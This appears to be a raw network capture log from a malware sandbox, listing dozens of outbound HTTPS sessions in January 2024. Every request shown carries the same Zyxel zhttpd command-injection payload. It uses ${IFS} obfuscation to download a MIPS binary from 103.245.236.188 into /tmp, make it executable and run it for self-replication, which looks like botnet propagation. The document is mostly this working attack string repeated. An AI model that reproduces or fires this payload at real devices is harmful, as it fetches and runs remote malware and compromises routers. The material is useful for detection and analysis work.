                                                Jan 12, 2024 18:24:43.039486885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6238192.168.2.134115099.94.215.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039541006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6239192.168.2.1337880166.73.84.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039592028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6240192.168.2.134324013.8.212.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039642096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6241192.168.2.133711065.158.111.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039675951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6242192.168.2.135208471.4.228.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039705038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6243192.168.2.1349376167.184.110.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039733887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6244192.168.2.1357914110.86.213.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039786100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6245192.168.2.133413264.176.86.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039814949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6246192.168.2.1335060144.141.22.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039875031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6247192.168.2.133976886.10.104.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039905071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6248192.168.2.1335376179.147.221.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039968014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6249192.168.2.1357912180.208.75.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.039997101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6250192.168.2.135048697.76.90.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040045023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6251192.168.2.134734450.25.213.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040107012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6252192.168.2.1359230222.165.115.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040117025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6253192.168.2.1354756178.45.178.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040146112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6254192.168.2.135033238.240.141.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040216923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6255192.168.2.1353014146.120.212.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040235996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6256192.168.2.135289690.9.11.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040266037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6257192.168.2.135374439.25.80.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040308952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6258192.168.2.1359166190.216.233.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040335894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6259192.168.2.135989498.35.2.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040390968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6260192.168.2.135710823.53.119.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040441036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6261192.168.2.135136099.241.210.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040478945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6262192.168.2.1346418204.56.110.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040519953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6263192.168.2.1342654137.170.172.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040571928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6264192.168.2.1350680188.246.250.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040616989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6265192.168.2.135614484.15.0.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040653944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6266192.168.2.135308297.21.27.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040697098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6267192.168.2.133520647.57.101.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040718079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6268192.168.2.134467486.1.86.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040792942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6269192.168.2.135695039.145.100.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040812969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6270192.168.2.1349218130.213.128.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040868998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6271192.168.2.1332876153.17.200.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040889978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6272192.168.2.134087078.252.147.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040944099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6273192.168.2.1357372148.210.174.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.040982962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6274192.168.2.135588242.83.136.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041039944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6275192.168.2.1337958201.167.247.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041073084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6276192.168.2.1333210178.244.248.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041107893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6277192.168.2.134508051.40.144.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041172028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6278192.168.2.1333062157.211.72.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041194916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6279192.168.2.1351980191.45.163.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041225910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6280192.168.2.1354584185.243.130.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041276932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6281192.168.2.1334512184.184.161.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041326046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6282192.168.2.1346990158.75.165.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041347027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6283192.168.2.133986896.205.82.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041387081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6284192.168.2.1350702169.113.84.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041451931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6285192.168.2.1339446161.36.42.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041481972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6286192.168.2.1356112161.184.244.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041521072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6287192.168.2.1352212184.173.229.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041563034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6288192.168.2.1344944158.188.48.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041608095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6289192.168.2.1347966124.253.213.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041632891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6290192.168.2.133410820.224.250.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041691065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6291192.168.2.1341968152.67.232.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041733027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6292192.168.2.1335634209.21.180.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041758060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6293192.168.2.134199248.108.68.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041841984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6294192.168.2.1346638178.246.234.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041868925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6295192.168.2.135821880.253.207.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041897058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6296192.168.2.1335834125.101.15.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041925907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6297192.168.2.1344256220.205.224.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.041979074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6298192.168.2.1359278155.179.197.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042017937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6299192.168.2.1350338157.100.32.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042076111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6300192.168.2.134830049.107.72.212443
                                                TimestampBytes transferredDirectionData
